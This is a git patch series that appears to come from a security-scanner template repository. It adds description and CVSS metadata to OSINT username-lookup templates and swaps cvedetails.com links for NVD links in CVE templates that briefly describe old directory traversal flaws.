a/osint/watchmemorecom.yaml +++ b/osint/watchmemorecom.yaml @@ -3,7 +3,12 @@ id: watchmemorecom info: name: watchmemore.com author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,watchmemorecom self-contained: true diff --git a/osint/watchmyfeed.yaml b/osint/watchmyfeed.yaml index 02bda8b04a..43d9895312 100644 --- a/osint/watchmyfeed.yaml +++ b/osint/watchmyfeed.yaml @@ -3,7 +3,12 @@ id: watchmyfeed info: name: Watchmyfeed author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,watchmyfeed self-contained: true diff --git a/osint/wattpad.yaml b/osint/wattpad.yaml index 41959e87b8..dad5a6b612 100644 --- a/osint/wattpad.yaml +++ b/osint/wattpad.yaml @@ -3,7 +3,12 @@ id: wattpad info: name: wattpad author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,wattpad self-contained: true diff --git a/osint/weasyl.yaml b/osint/weasyl.yaml index b1ab56be23..84800997a8 100644 --- a/osint/weasyl.yaml +++ b/osint/weasyl.yaml @@ -3,7 +3,12 @@ id: weasyl info: name: Weasyl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,weasyl self-contained: true diff --git a/osint/weebly.yaml b/osint/weebly.yaml index 934f7106a2..2ef096ca7c 100644 --- a/osint/weebly.yaml +++ b/osint/weebly.yaml @@ -3,7 +3,12 @@ id: weebly info: name: weebly author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,weebly self-contained: true diff --git a/osint/wego.yaml b/osint/wego.yaml index 95033fe2d5..da69b04952 100644 --- a/osint/wego.yaml +++ b/osint/wego.yaml @@ -3,7 +3,12 @@ id: wego info: name: wego author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,wego self-contained: true diff --git a/osint/weheartit.yaml b/osint/weheartit.yaml index c416f03398..cc2e310513 100644 --- a/osint/weheartit.yaml +++ b/osint/weheartit.yaml @@ -3,7 +3,12 @@ id: weheartit info: name: weheartit author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,weheartit self-contained: true diff --git a/osint/weibo.yaml b/osint/weibo.yaml index ad3a281a65..29a63e4946 100644 --- a/osint/weibo.yaml +++ b/osint/weibo.yaml @@ -3,7 +3,12 @@ id: weibo info: name: weibo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,weibo self-contained: true diff --git a/osint/wetransfer.yaml b/osint/wetransfer.yaml index 478b2dfcab..fc87f45f69 100644 --- a/osint/wetransfer.yaml +++ b/osint/wetransfer.yaml @@ -3,7 +3,12 @@ id: wetransfer info: name: WeTransfer author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,wetransfer self-contained: true diff --git a/osint/wikidot.yaml b/osint/wikidot.yaml index 6fc69e6dd8..4c6050f8ff 100644 --- a/osint/wikidot.yaml +++ b/osint/wikidot.yaml @@ -3,7 +3,12 @@ id: wikidot info: name: Wikidot author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,wikidot self-contained: true diff --git a/osint/wikipedia.yaml b/osint/wikipedia.yaml index 6516edada1..513ccbc120 100644 --- a/osint/wikipedia.yaml +++ b/osint/wikipedia.yaml @@ -3,7 +3,12 @@ id: wikipedia info: name: Wikipedia author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,wikipedia self-contained: true diff --git a/osint/wimkin-publicprofile.yaml b/osint/wimkin-publicprofile.yaml index 4ad30c63e4..0ceb472386 100644 --- a/osint/wimkin-publicprofile.yaml +++ b/osint/wimkin-publicprofile.yaml @@ -3,7 +3,12 @@ id: wimkin-publicprofile info: name: Wimkin-PublicProfile author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,wimkin-publicprofile self-contained: true diff --git a/osint/wireclub.yaml b/osint/wireclub.yaml index 387a2bcfac..46479f40cf 100644 --- a/osint/wireclub.yaml +++ b/osint/wireclub.yaml @@ -3,7 +3,12 @@ id: wireclub info: name: Wireclub author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,wireclub self-contained: true diff --git a/osint/wishlistr.yaml b/osint/wishlistr.yaml index 7f7a5c31ec..b9433091b4 100644 --- a/osint/wishlistr.yaml +++ b/osint/wishlistr.yaml @@ -3,7 +3,12 @@ id: wishlistr info: name: wishlistr author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,wishlistr self-contained: true diff --git a/osint/wolni-slowianie.yaml b/osint/wolni-slowianie.yaml index 675d4bd212..48854a96a1 100644 --- a/osint/wolni-slowianie.yaml +++ b/osint/wolni-slowianie.yaml @@ -3,7 +3,12 @@ id: wolni-slowianie info: name: Wolni Słowianie author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,wolni-slowianie self-contained: true diff --git a/osint/wordnik.yaml b/osint/wordnik.yaml index fa42a5cc45..4118d733c3 100644 --- a/osint/wordnik.yaml +++ b/osint/wordnik.yaml @@ -3,7 +3,12 @@ id: wordnik info: name: wordnik author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,wordnik self-contained: true diff --git a/osint/wordpress-support.yaml b/osint/wordpress-support.yaml index 12ae56c427..6ea72d0cd8 100644 --- a/osint/wordpress-support.yaml +++ b/osint/wordpress-support.yaml @@ -3,7 +3,12 @@ id: wordpress-support info: name: WordPress Support author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,wordpress-support self-contained: true diff --git a/osint/wordpress.yaml b/osint/wordpress.yaml index 740125c8f6..b694c5b7ee 100644 --- a/osint/wordpress.yaml +++ b/osint/wordpress.yaml @@ -3,7 +3,12 @@ id: wordpress info: name: WordPress author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,wordpress self-contained: true diff --git a/osint/wowhead.yaml b/osint/wowhead.yaml index f8ee5862b4..c98b8af3bb 100644 --- a/osint/wowhead.yaml +++ b/osint/wowhead.yaml @@ -3,7 +3,12 @@ id: wowhead info: name: Wowhead author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,wowhead self-contained: true diff --git a/osint/wykop.yaml b/osint/wykop.yaml index a03227315e..e7230f95e1 100644 --- a/osint/wykop.yaml +++ b/osint/wykop.yaml @@ -3,7 +3,12 @@ id: wykop info: name: Wykop author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,wykop self-contained: true diff --git a/osint/xanga.yaml b/osint/xanga.yaml index 74df259cc9..e93ff37799 100644 --- a/osint/xanga.yaml +++ b/osint/xanga.yaml @@ -3,7 +3,12 @@ id: xanga info: name: Xanga author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,xanga self-contained: true diff --git a/osint/xbox-gamertag.yaml b/osint/xbox-gamertag.yaml index dbd65fedde..2d946d73c4 100644 --- a/osint/xbox-gamertag.yaml +++ b/osint/xbox-gamertag.yaml @@ -3,7 +3,12 @@ id: xbox-gamertag info: name: Xbox Gamertag author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,xbox-gamertag self-contained: true diff --git a/osint/xhamster.yaml b/osint/xhamster.yaml index 8d9c1fe9f3..d0260650d6 100644 --- a/osint/xhamster.yaml +++ b/osint/xhamster.yaml @@ -3,7 +3,12 @@ id: xhamster info: name: xHamster author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,xhamster self-contained: true diff --git a/osint/xing.yaml b/osint/xing.yaml index e2febef379..3021dab673 100644 --- a/osint/xing.yaml +++ b/osint/xing.yaml @@ -3,7 +3,12 @@ id: xing info: name: Xing author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,xing self-contained: true diff --git a/osint/xvideos-models.yaml b/osint/xvideos-models.yaml index 051a8bc3aa..4d51dc9a54 100644 --- a/osint/xvideos-models.yaml +++ b/osint/xvideos-models.yaml @@ -3,7 +3,12 @@ id: xvideos-models info: name: XVIDEOS-models author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,xvideos-models self-contained: true diff --git a/osint/xvideos-profiles.yaml b/osint/xvideos-profiles.yaml index ebd70bc8b6..01a4cc8f17 100644 --- a/osint/xvideos-profiles.yaml +++ b/osint/xvideos-profiles.yaml @@ -3,7 +3,12 @@ id: xvideos-profiles info: name: XVIDEOS-profiles author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,xvideos-profiles self-contained: true diff --git a/osint/yahoo-japan-auction.yaml b/osint/yahoo-japan-auction.yaml index 74ee0caf76..ecfe5b9d57 100644 --- a/osint/yahoo-japan-auction.yaml +++ b/osint/yahoo-japan-auction.yaml @@ -3,7 +3,12 @@ id: yahoo-japan-auction info: name: Yahoo! JAPAN Auction author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,yahoo-japan-auction self-contained: true diff --git a/osint/yapishu.yaml b/osint/yapishu.yaml index acf5558357..2bfec7c562 100644 --- a/osint/yapishu.yaml +++ b/osint/yapishu.yaml @@ -3,7 +3,12 @@ id: yapishu info: name: yapishu author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,yapishu self-contained: true diff --git a/osint/yazawaj.yaml b/osint/yazawaj.yaml index af856a1f19..c57f5fc478 100644 --- a/osint/yazawaj.yaml +++ b/osint/yazawaj.yaml @@ -3,7 +3,12 @@ id: yazawaj info: name: Yazawaj author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,yazawaj self-contained: true diff --git a/osint/yelp.yaml b/osint/yelp.yaml index e1b46d4860..cbf9f491d1 100644 --- a/osint/yelp.yaml +++ b/osint/yelp.yaml @@ -3,7 +3,12 @@ id: yelp info: name: Yelp author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,yelp self-contained: true diff --git a/osint/youpic.yaml b/osint/youpic.yaml index b3a73fe5af..9b48334aa3 100644 --- a/osint/youpic.yaml +++ b/osint/youpic.yaml @@ -3,7 +3,12 @@ id: youpic info: name: youpic author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,youpic self-contained: true diff --git a/osint/youtube.yaml b/osint/youtube.yaml index 39a3f97ca9..6908c5e2a2 100644 --- a/osint/youtube.yaml +++ b/osint/youtube.yaml @@ -3,7 +3,12 @@ id: youtube info: name: YouTube author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,youtube self-contained: true diff --git a/osint/zatrybipl.yaml b/osint/zatrybipl.yaml index bbae6f2f35..81d316715b 100644 --- a/osint/zatrybipl.yaml +++ b/osint/zatrybipl.yaml @@ -3,7 +3,12 @@ id: zatrybipl info: name: zatrybi.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,zatrybipl self-contained: true diff --git a/osint/zbiornik.yaml b/osint/zbiornik.yaml index dd70103460..92c33f5307 100644 --- a/osint/zbiornik.yaml +++ b/osint/zbiornik.yaml @@ -3,7 +3,12 @@ id: zbiornik info: name: Zbiornik author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,zbiornik self-contained: true diff --git a/osint/zhihu.yaml b/osint/zhihu.yaml index e6e1e7c910..405cea33e8 100644 --- a/osint/zhihu.yaml +++ b/osint/zhihu.yaml @@ -3,7 +3,12 @@ id: zhihu info: name: zhihu author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,zhihu self-contained: true diff --git a/osint/zillow.yaml b/osint/zillow.yaml index 0f7a9eb279..1eca184ef2 100644 --- a/osint/zillow.yaml +++ b/osint/zillow.yaml @@ -3,7 +3,12 @@ id: zillow info: name: Zillow author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,zillow self-contained: true diff --git a/osint/zmarsacom.yaml b/osint/zmarsacom.yaml index c3e10fa8eb..11f5b4a275 100644 --- a/osint/zmarsacom.yaml +++ b/osint/zmarsacom.yaml @@ -3,7 +3,12 @@ id: zmarsacom info: name: zmarsa.com author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,zmarsacom self-contained: true diff --git a/osint/zomato.yaml b/osint/zomato.yaml index 2e446c997e..710baecdbc 100644 --- a/osint/zomato.yaml +++ b/osint/zomato.yaml @@ -3,7 +3,12 @@ id: zomato info: name: Zomato author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,zomato self-contained: true diff --git a/osint/zoomitir.yaml b/osint/zoomitir.yaml index 72b20d6b48..5eba8a4495 100644 --- a/osint/zoomitir.yaml +++ b/osint/zoomitir.yaml @@ -3,7 +3,12 @@ id: zoomitir info: name: zoomitir author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,zoomitir self-contained: true From 5486b3444a5d733b343beaa2b7547b538022d4d7 Mon Sep 17 00:00:00 2001 From: sullo <sullo@cirt.net> Date: Thu, 2 Mar 2023 17:00:10 -0500 Subject: [PATCH 58/84] Replace all cvedeails.com links with nist --- cves/2008/CVE-2008-6172.yaml | 2 +- cves/2009/CVE-2009-5114.yaml | 2 +- cves/2010/CVE-2010-0157.yaml | 2 +- cves/2010/CVE-2010-0467.yaml | 2 +- cves/2010/CVE-2010-0696.yaml | 2 +- cves/2010/CVE-2010-0759.yaml | 2 +- cves/2010/CVE-2010-0942.yaml | 2 +- cves/2010/CVE-2010-0943.yaml | 2 +- cves/2010/CVE-2010-0944.yaml | 2 +- cves/2010/CVE-2010-0972.yaml | 2 +- cves/2010/CVE-2010-0982.yaml | 2 +- cves/2010/CVE-2010-0985.yaml | 2 +- cves/2010/CVE-2010-1056.yaml | 2 +- cves/2010/CVE-2010-1081.yaml | 2 +- cves/2010/CVE-2010-1217.yaml | 2 +- cves/2010/CVE-2010-1219.yaml | 2 +- cves/2010/CVE-2010-1302.yaml | 2 +- cves/2010/CVE-2010-1304.yaml | 2 +- cves/2010/CVE-2010-1305.yaml | 2 +- cves/2010/CVE-2010-1306.yaml | 2 +- cves/2010/CVE-2010-1307.yaml | 2 +- cves/2010/CVE-2010-1308.yaml | 2 +- cves/2010/CVE-2010-1312.yaml | 2 +- cves/2010/CVE-2010-1313.yaml | 2 +- cves/2010/CVE-2010-1314.yaml | 2 +- cves/2010/CVE-2010-1315.yaml | 2 +- cves/2010/CVE-2010-1340.yaml | 2 +- cves/2010/CVE-2010-1345.yaml | 2 +- cves/2010/CVE-2010-1352.yaml | 2 +- cves/2010/CVE-2010-1353.yaml | 2 +- cves/2010/CVE-2010-1354.yaml | 2 +- cves/2010/CVE-2010-1461.yaml | 2 +- cves/2010/CVE-2010-1469.yaml | 2 +- cves/2010/CVE-2010-1470.yaml | 2 +- cves/2010/CVE-2010-1471.yaml | 2 +- cves/2010/CVE-2010-1472.yaml | 2 +- cves/2010/CVE-2010-1473.yaml | 2 +- cves/2010/CVE-2010-1474.yaml | 2 +- cves/2010/CVE-2010-1475.yaml | 2 +- cves/2010/CVE-2010-1476.yaml | 2 +- cves/2010/CVE-2010-1478.yaml | 2 +- cves/2010/CVE-2010-1491.yaml | 2 +- cves/2010/CVE-2010-1494.yaml | 2 +- cves/2010/CVE-2010-1495.yaml | 2 +- cves/2010/CVE-2010-1531.yaml | 2 +- cves/2010/CVE-2010-1532.yaml | 2 +- cves/2010/CVE-2010-1533.yaml | 2 +- cves/2010/CVE-2010-1534.yaml | 2 +- cves/2010/CVE-2010-1535.yaml | 2 +- cves/2010/CVE-2010-1540.yaml | 2 +- cves/2010/CVE-2010-1601.yaml | 2 +- cves/2010/CVE-2010-1602.yaml | 2 +- cves/2010/CVE-2010-1603.yaml | 2 +- cves/2010/CVE-2010-1607.yaml | 2 +- cves/2010/CVE-2010-1653.yaml | 2 +- cves/2010/CVE-2010-1658.yaml | 2 +- cves/2010/CVE-2010-1714.yaml | 2 +- cves/2010/CVE-2010-1715.yaml | 2 +- cves/2010/CVE-2010-1717.yaml | 2 +- cves/2010/CVE-2010-1718.yaml | 2 +- cves/2010/CVE-2010-1719.yaml | 2 +- cves/2010/CVE-2010-1722.yaml | 2 +- cves/2010/CVE-2010-1723.yaml | 2 +- cves/2010/CVE-2010-1858.yaml | 2 +- cves/2010/CVE-2010-1875.yaml | 2 +- cves/2010/CVE-2010-1878.yaml | 2 +- cves/2010/CVE-2010-1952.yaml | 2 +- cves/2010/CVE-2010-1953.yaml | 2 +- cves/2010/CVE-2010-1954.yaml | 2 +- cves/2010/CVE-2010-1955.yaml | 2 +- cves/2010/CVE-2010-1956.yaml | 2 +- cves/2010/CVE-2010-1957.yaml | 2 +- cves/2010/CVE-2010-1977.yaml | 2 +- cves/2010/CVE-2010-1979.yaml | 2 +- cves/2010/CVE-2010-1980.yaml | 2 +- cves/2010/CVE-2010-1981.yaml | 2 +- cves/2010/CVE-2010-1982.yaml | 2 +- cves/2010/CVE-2010-1983.yaml | 2 +- cves/2010/CVE-2010-2033.yaml | 2 +- cves/2010/CVE-2010-2034.yaml | 2 +- cves/2010/CVE-2010-2035.yaml | 2 +- cves/2010/CVE-2010-2036.yaml | 2 +- cves/2010/CVE-2010-2037.yaml | 2 +- cves/2010/CVE-2010-2045.yaml | 2 +- cves/2010/CVE-2010-2050.yaml | 2 +- cves/2010/CVE-2010-2122.yaml | 2 +- cves/2010/CVE-2010-2128.yaml | 2 +- cves/2010/CVE-2010-2259.yaml | 2 +- cves/2010/CVE-2010-2507.yaml | 2 +- cves/2010/CVE-2010-2680.yaml | 2 +- cves/2010/CVE-2010-2682.yaml | 2 +- cves/2010/CVE-2010-2857.yaml | 2 +- cves/2010/CVE-2010-2918.yaml | 2 +- cves/2010/CVE-2010-2920.yaml | 2 +- cves/2010/CVE-2010-3203.yaml | 2 +- cves/2010/CVE-2010-3426.yaml | 2 +- cves/2010/CVE-2010-4282.yaml | 2 +- cves/2010/CVE-2010-4617.yaml | 2 +- cves/2010/CVE-2010-4719.yaml | 2 +- cves/2010/CVE-2010-4769.yaml | 2 +- cves/2010/CVE-2010-4977.yaml | 2 +- cves/2010/CVE-2010-5028.yaml | 2 +- cves/2010/CVE-2010-5278.yaml | 2 +- cves/2010/CVE-2010-5286.yaml | 2 +- cves/2012/CVE-2012-0981.yaml | 2 +- cves/2012/CVE-2012-0991.yaml | 2 +- cves/2012/CVE-2012-0996.yaml | 2 +- cves/2012/CVE-2012-1226.yaml | 2 +- cves/2012/CVE-2012-4253.yaml | 2 +- cves/2012/CVE-2012-4878.yaml | 2 +- cves/2015/CVE-2015-4074.yaml | 2 +- cves/2015/CVE-2015-4632.yaml | 2 +- cves/2017/CVE-2017-9833.yaml | 2 +- cves/2018/CVE-2018-10201.yaml | 2 +- cves/2018/CVE-2018-19365.yaml | 2 +- cves/2022/CVE-2022-24900.yaml | 2 +- 116 files changed, 116 insertions(+), 116 deletions(-) diff --git a/cves/2008/CVE-2008-6172.yaml b/cves/2008/CVE-2008-6172.yaml index 362a408e8f..ca45a1c678 100644 --- a/cves/2008/CVE-2008-6172.yaml +++ b/cves/2008/CVE-2008-6172.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. reference: - https://www.exploit-db.com/exploits/6817 - - https://www.cvedetails.com/cve/CVE-2008-6172 + - https://nvd.nist.gov/vuln/detail/CVE-2008-6172 - http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/ - http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/ classification: diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml index 5af5b4b502..b305dc4fd2 100644 --- a/cves/2009/CVE-2009-5114.yaml +++ b/cves/2009/CVE-2009-5114.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. reference: - https://www.exploit-db.com/exploits/36994 - - https://www.cvedetails.com/cve/CVE-2009-5114 + - https://nvd.nist.gov/vuln/detail/CVE-2009-5114 - http://websecurity.com.ua/2628/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321 remediation: Apply all relevant security patches and product upgrades. diff --git a/cves/2010/CVE-2010-0157.yaml b/cves/2010/CVE-2010-0157.yaml index da7e3a7f63..e59763e954 100644 --- a/cves/2010/CVE-2010-0157.yaml +++ b/cves/2010/CVE-2010-0157.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. reference: - https://www.exploit-db.com/exploits/10943 - - https://www.cvedetails.com/cve/CVE-2010-0157 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0157 - http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/ - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-0467.yaml b/cves/2010/CVE-2010-0467.yaml index 3fe2911280..93f0e41bc3 100644 --- a/cves/2010/CVE-2010-0467.yaml +++ b/cves/2010/CVE-2010-0467.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. reference: - https://www.exploit-db.com/exploits/11282 - - https://www.cvedetails.com/cve/CVE-2010-0467 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0467 - http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/ - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html remediation: Apply all relevant security patches and upgrades. diff --git a/cves/2010/CVE-2010-0696.yaml b/cves/2010/CVE-2010-0696.yaml index 13c6825f6c..918c1d665f 100644 --- a/cves/2010/CVE-2010-0696.yaml +++ b/cves/2010/CVE-2010-0696.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/11447 - - https://www.cvedetails.com/cve/CVE-2010-0696 + - https://nvd.nist.gov/vuln/detail/CVE-2010-0696 - http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/ - http://www.joomlaworks.gr/content/view/77/34/ remediation: Upgrade to a supported version. diff --git a/cves/2010/CVE-2010-0759.yaml b/cves/2010/CVE-2010-0759.yaml index 06f7036b6b..7d4afe1404 100644 --- a/cves/2010/CVE-2010-0759.yaml +++ b/cves/2010/CVE-2010-0759.yaml @@ -7,7 +7,7 @@ info: description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design 